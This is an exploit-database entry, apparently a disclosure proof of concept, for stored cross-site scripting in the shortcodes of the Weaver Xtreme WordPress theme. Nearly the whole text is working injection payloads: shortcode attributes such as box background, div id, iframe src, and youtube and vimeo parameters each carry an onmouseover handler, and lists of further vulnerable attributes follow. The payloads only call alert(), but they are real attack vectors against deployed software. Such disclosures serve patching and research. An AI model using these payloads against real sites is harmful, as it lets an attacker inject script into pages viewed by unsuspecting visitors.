Share
## https://sploitus.com/exploit?id=WPEX-ID:D00824A3-7DF5-4B52-A31B-5FDFB19C970F
Required theme: https://wordpress.org/themes/weaver-xtreme
[box background='red" onmouseover="alert(/XSS-background/)"']
Other affected attributes (found when verifying the issue): border_rule, border_radius, color, margin, padding, style
Other affected shortcodes identified when verifying the issue:
[bloginfo style='"onmouseover=alert(/XSS-style/)//']
[div id='"onmouseover=alert(/XSS-id/)//']
Other affected attributes: class, style
[span id='"onmouseover=alert(/XSS-id/)//']
Other affected attributes: class, style
[header_image style='"onmouseover=alert(/XSS-style/)//']
Other affected attributes: h, w
[html args='onmouseover=alert(/XSS-args/) style=display:block;width:100px;height:100px;background:red']
[iframe src='"onmouseover=alert(/XSS-src/)//']
[iframe src='1' height='"onmouseover=alert(/XSS-height/)//']
Other affected attributes: percent, style
[site_tagline style='"onmouseover=alert(/XSS-style/)//']
[site_title style='"onmouseover=alert(/XSS-style/)//']
[vimeo id='"onmouseover=alert(/XSS-id/)//']
[vimeo id='1' color='"onmouseover=alert(/XSS-color/)//']
Other affected attributes: percent
[youtube id='"onmouseover=alert(/XSS-id/)//']
[youtube id='1' autohide='"onmouseover=alert(/XSS-autohide/)//']
Other affected attributes: color, color1, color2, end, fs, iv_load_policy, origin, percent, playlist, rel, showinfo, start, wmode